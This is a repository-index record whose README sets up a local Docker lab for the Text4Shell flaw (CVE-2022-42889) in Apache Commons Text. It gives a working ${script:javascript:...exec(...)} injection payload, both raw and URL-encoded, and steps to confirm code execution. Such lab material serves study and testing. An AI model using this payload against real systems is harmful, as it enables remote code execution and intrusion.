{"id":13296887,"url":"https://github.com/karthikuj/cve-2022-42889-text4shell-docker","last_synced_at":"2025-03-18T18:33:45.285Z","repository":{"id":61988880,"uuid":"553496497","full_name":"karthikuj/cve-2022-42889-text4shell-docker","owner":"karthikuj","description":"Dockerized POC for CVE-2022-42889 Text4Shell","archived":false,"fork":false,"pushed_at":"2022-11-14T17:12:41.000Z","size":4,"stargazers_count":75,"open_issues_count":3,"forks_count":32,"subscribers_count":1,"default_branch":"master","last_synced_at":"2024-10-11T00:46:49.076Z","etag":null,"topics":["act4shell","apache","commons","cve","cve-2022-42889","poc","text4shell"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/karthikuj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-10-18T09:58:00.000Z","updated_at":"2024-08-12T20:27:52.000Z","dependencies_parsed_at":"2023-01-23T02:16:01.345Z","dependency_job_id":null,"html_url":"https://github.com/karthikuj/cve-2022-42889-text4shell-docker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/karthikuj%2Fcve-2022-42889-text4shell-docker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/karthikuj%2Fcve-2022-42889-text4shell-docker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/karthikuj%2Fcve-2022-42889-text4shell-docker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/karthikuj%2Fcve-2022-42889-text4shell-docker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/karthikuj","download_url":"https://codeload.github.com/karthikuj/cve-2022-42889-text4shell-docker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221715975,"owners_count":16868647,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["act4shell","apache","commons","cve","cve-2022-42889","poc","text4shell"],"created_at":"2024-07-29T17:21:17.862Z","updated_at":"2024-10-27T18:15:50.296Z","avatar_url":"https://github.com/karthikuj.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)\n-------------\n\n\n1. Maven install to create the fat jar\n\n```\nmvn clean install\n```\n\n2. Docker build\n\n```\ndocker build --tag=text4shell .\n```\n\n3. Docker run\n\n```\ndocker run -p 80:8080 text4shell\n```\n\n4. Test the app\n\n```\nhttp://localhost/text4shell/attack?search=\u003canything\u003e\n```\n\n5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:\n\n```\n${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}\n```\n\nhttp://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D\n\n6. You can also try using `dns` or `url` prefixes.\n\n7. Get the container id\n\n```\ndocker container ls\n```\n\n8. Get into the app\n\n```\ndocker exec -it \u003ccontainer_id\u003e bash\n```\n\n9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):\n\n```\nls /tmp/\n```\n\n10. To stop the container\n\n```\ndocker container stop \u003ccontainer_id\u003e\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkarthikuj%2Fcve-2022-42889-text4shell-docker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkarthikuj%2Fcve-2022-42889-text4shell-docker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkarthikuj%2Fcve-2022-42889-text4shell-docker/lists"}